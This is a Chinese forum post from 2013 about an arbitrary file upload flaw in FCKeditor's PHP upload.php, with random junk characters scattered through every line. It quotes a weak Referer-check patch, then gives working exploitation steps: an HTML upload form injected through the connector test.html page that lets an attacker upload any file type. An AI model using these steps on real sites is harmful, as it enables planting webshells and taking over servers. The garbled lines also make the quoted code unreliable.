漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
. X9 Q2 S( F3 _% u+ O) c9 }5 \网上给出的修复方案是. Z! c0 u5 \: f: g; }0 J
修复方法,删除FCK编辑器用其他的编辑器
8 G# s( q$ u! ^0 \# _或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件6 ^' `; W5 U. k0 E" h0 E# i6 i
在
# k+ c0 @ q+ _3 m& a+ grequire(‘config.php’);
2 ?) ]! A" c7 [# x$ z5 Yrequire(‘util.php’);
]# ]" S$ Q) T- K7 E! S! f- w! @的下面添加以下代码—————————–
$ k! \7 U' N* |9 s+ G//防止外部提交
% S2 l" G7 ]& ?: g9 xfunction outsidepost()
2 m. d, R7 l$ d) P6 N1 n{
( G9 z' i" j3 h& \$servername=$_SERVER['SERVER_NAME'];
% |% | m* I0 b/ F; A$sub_from=@$_SERVER['HTTP_REFERER']; |+ J& j5 [6 J; w) i1 o7 ^" ?
$sub_len=strlen($servername);2 W* S7 J: T. b. r' C
$checkfrom=substr($sub_from,7,$sub_len);
+ v* D, O2 m1 F# r* `if($checkfrom!=$servername){* S3 S, o* O: [
echo(“you don’t outsidepost!”);
6 J; e' Q& U' V1 H xexit;
; A( O/ n4 [2 l& B; c. A}
5 i$ r& g) V) m* q* J ~$ N}
0 \: U. H* x- Z$ C0 n& p/ H: Goutsidepost();8 H9 N( m5 }. T6 H; P# _% w$ J) C
防止外部提交,但是没有防止内部提交, c5 O) h% |/ c- y, s
利用方法:
6 v+ M4 ~2 H3 [1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
9 Q5 G' K; J9 _3 D/ M' _4 U2,在Current Folder 框输入
6 h5 l9 X2 L2 w y( a" p9 U; U( P/ i<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>! d; E& x; `: I P3 z: q; r# |
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
! d4 `! ]4 t0 d; H. U% YPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对